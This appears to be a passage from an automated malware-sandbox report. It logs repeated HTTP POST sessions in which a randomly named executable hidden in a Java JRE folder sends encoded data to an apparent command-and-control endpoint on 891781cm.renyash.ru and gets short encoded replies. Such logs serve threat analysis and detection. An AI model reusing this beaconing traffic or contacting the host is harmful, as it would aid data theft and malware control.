                                                                                                                  63192.168.2.449815104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:57.043950081 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:57.404722929 CET1072OUTData Raw: 55 54 5d 53 5a 5a 54 5a 55 5a 54 59 51 5d 55 55 58 5a 5c 5c 59 5d 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UT]SZZTZUZTYQ]UUXZ\\Y]RX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(?2 Y2>!Y>X?Y':.$8X$Y"Q$?,,> ^<4(<#^!'^)?
                                                                                                                  Jan 1, 2025 15:02:57.488173962 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  64192.168.2.449817104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:57.610253096 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:57.962969065 CET1796OUTData Raw: 55 54 58 50 5a 57 54 5d 55 5a 54 59 51 5f 55 53 58 59 5c 5c 59 5c 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UTXPZWT]UZTYQ_USXY\\Y\R[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ Y+?\4:$.\)$71-$-3<;Y/X$]?.4V*,#^!'^)7
                                                                                                                  Jan 1, 2025 15:02:58.063896894 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:58.340087891 CET952INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:58 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nHKBElEsKL5fMLRt%2BuFcrbDO2gTg2IyLMVOCkPT7QckRGP2wQEikmKzuIq1cP0jDl%2FYCLB1EDBEXbYUI4iFAQ4boGj6qd8iEFH9sTPe2WBqg6fHgvfgDckf0AgTG2WX87GvcxV0P"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cd09bbc41f8-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7807&min_rtt=1636&rtt_var=12956&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=28624&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 51 27 05 23 14 28 07 29 00 3b 11 27 1f 25 3c 26 5e 27 0e 0a 5b 26 2e 1b 5d 2f 38 2b 02 3e 3b 37 5e 26 5c 2e 01 20 31 2d 00 31 26 2e 5d 04 1d 26 02 29 04 25 01 3f 01 31 58 29 32 0e 5d 27 24 28 03 32 0a 0d 02 30 3e 31 01 22 1c 01 1d 27 0d 3f 0e 28 17 3c 07 24 03 08 56 21 2a 2e 57 0d 12 21 0e 25 00 13 11 3d 0f 20 52 20 2f 23 57 25 3f 05 1c 24 2c 20 12 37 06 32 10 3e 06 20 11 36 37 29 1f 24 04 0d 5e 22 3a 39 13 23 33 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"Q'#();'%<&^'[&.]/8+>;7^&\. 1-1&.]&)%?1X)2]'$(20>1"'?(<$V!*.W!%= R /#W%?$, 72> 67)$^":9#3"T /T=VO0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  65192.168.2.449818104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:57.736423016 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:58.087512016 CET1072OUTData Raw: 50 56 58 51 5f 59 51 59 55 5a 54 59 51 5a 55 5c 58 52 5c 5d 59 5c 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PVXQ_YQYUZTYQZU\XR\]Y\R^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ \+<17;-1.>X30$.V-3$Z'Z->+?>$=#^!'^)#
                                                                                                                  Jan 1, 2025 15:02:58.189572096 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:58.454675913 CET811INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:58 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ivuSUSgTwjDMPJ0SVCYrIvb3gMlG4b42eFZFu%2BOcIXAIHw3rz0%2BcKmuU32HByvHMAcsnIzdFM71dxHd%2FT0XxgiMNSMw%2BwfaTC4tDZ4eANNkhsL%2BLnqM76YPe9aEfHDj4jLnR0%2Fp4"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cd16977436f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7796&min_rtt=1750&rtt_var=12749&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=29128&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  66192.168.2.449826104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:58.593240023 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:58.947052002 CET1072OUTData Raw: 55 57 58 5d 5a 5b 54 5a 55 5a 54 59 51 59 55 55 58 52 5c 54 59 53 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UWX]Z[TZUZTYQYUUXR\TYSRX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ <.#;&1.>(=#'':Q.$;3Y"T0<8/>7(=<=<#^!'^)/
                                                                                                                  Jan 1, 2025 15:02:59.051121950 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:59.312905073 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:59 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OsWa1sq%2FUpeWd8k8xV%2F7C0qDnJjaZp9Mm6yNTigU2lwmTc3cuuRPmKcn2cEdzWdhYo7rWb2WbutoolHt3wEg4Ho2qn6gopZEr539tKmE8xaSeiKlG7gLNhydyUg%2BACh0L0g%2FBdus"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cd6c98fc47a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=9659&min_rtt=4197&rtt_var=12498&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=30482&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  67192.168.2.449834104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:59.456517935 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:59.816833973 CET1072OUTData Raw: 55 50 58 54 5a 5a 51 54 55 5a 54 59 51 5f 55 57 58 52 5c 5c 59 56 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UPXTZZQTUZTYQ_UWXR\\YVRZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ Y(*#(!&%*>3'>,4,]',-'3Z/=(+4S)<#^!'^)7
                                                                                                                  Jan 1, 2025 15:02:59.985574007 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:00.271431923 CET813INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:00 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JdqDLv73zVaqt9jc2Rlaq0Z0EflcotMZa4lbNTQO46%2F0cMKTYnQW5CtVPTaMP0eLoXiN5i1qQd820%2FC%2BQhWrUpWpUU9%2BsHPPBbqojqCrqF%2BhAM4KDJrgpebpBV2GSY4%2FqnfXq3tu"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cdc9f7941f3-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=61143&min_rtt=49266&rtt_var=26958&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=29635&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  68192.168.2.449840104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:00.411031961 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:00.759402037 CET1072OUTData Raw: 50 53 5d 53 5a 58 54 58 55 5a 54 59 51 5e 55 53 58 5c 5c 5f 59 57 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PS]SZXTXUZTYQ^USX\\_YWR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ _+ +:2%X=&4P-B<$/&0<0;>=>+><#^!'^)3
                                                                                                                  Jan 1, 2025 15:03:00.865242004 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:01.120338917 CET805INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:01 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RZFbSEMEMHaPZjQIuy1oYcsiayafK5FzDcrnqmQASHRR9qbHOb7aRM3v7QD0WCFKJRh0Aa%2BPvu%2FsNxRoIvj48nOQaG7hSDa1KnyChkEGF9Ejchip0e15rObHO%2B7R3xXbTUO6BY6c"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30ce21b8ade97-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=6828&min_rtt=1460&rtt_var=11284&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=32876&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  69192.168.2.449846104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:01.246016026 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:01.603075981 CET1072OUTData Raw: 55 50 5d 57 5a 5b 51 59 55 5a 54 59 51 5f 55 5d 58 5a 5c 54 59 54 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UP]WZ[QYUZTYQ_U]XZ\TYTR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (/!Z#%X&X%]*X#Z3.,$?'6W0Z;_8$^(4R>#^!'^)7
                                                                                                                  Jan 1, 2025 15:03:01.693857908 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:01.888957024 CET817INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:01 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fMk%2B%2FO9Mv10MRls%2FsGeuusWO76RvxzrOjVvj3qbecs4%2FIWdZwaKPSEFwMx%2FZ8V2J3HkjI55qU0Fh%2FEKYZUWk5IMl38%2F5OQU6nIves6LV%2FsRMqtdZ%2Ffud39MRDe36c8V79jzXpWbR"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30ce7496042cc-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2116&min_rtt=1623&rtt_var=1594&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=262259&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  70192.168.2.449852104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:02.010890007 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:02.369349003 CET1072OUTData Raw: 55 56 58 57 5a 5e 51 5f 55 5a 54 59 51 59 55 53 58 5b 5c 55 59 53 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UVXWZ^Q_UZTYQYUSX[\UYSR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#<1X =1.\*=#'1-40?*V'#,><+)#^!'^)/
                                                                                                                  Jan 1, 2025 15:03:02.470474005 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:02.717262030 CET811INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:02 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y8Ta9Y978ZKdcN3v5m2sMunyUum3AqIo4BQezaNFsphN%2FQ%2FjgV5Cb5fc5E9V%2BVa7oc2q%2FUk4daGA2wprNoEAxVfFFXFH7WInBXolYNW2jMvCdhTaDqQbz4%2BhRNe04sQhrBZg%2FTFu"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cec1df342dc-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2858&min_rtt=1724&rtt_var=2914&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=135222&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  71192.168.2.449859104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:02.861068964 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:03.212451935 CET1072OUTData Raw: 50 53 58 54 5f 5d 51 5f 55 5a 54 59 51 5a 55 5d 58 53 5c 54 59 52 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PSXT_]Q_UZTYQZU]XS\TYRR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#)/71Y$>:*<'$:W:$ 0,-$$,8[<X<R=,#^!'^)#
                                                                                                                  Jan 1, 2025 15:03:03.358174086 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  72192.168.2.449864104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:03.359522104 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:03.712490082 CET1796OUTData Raw: 55 5f 58 56 5f 5d 51 5b 55 5a 54 59 51 52 55 5d 58 59 5c 5d 59 53 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U_XV_]Q[UZTYQRU]XY\]YSR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ +?#]=2X)\)>7Z$4*T.$,-$X8-(=.*<#^!'^)
                                                                                                                  Jan 1, 2025 15:03:03.831931114 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:04.093955040 CET951INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:04 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
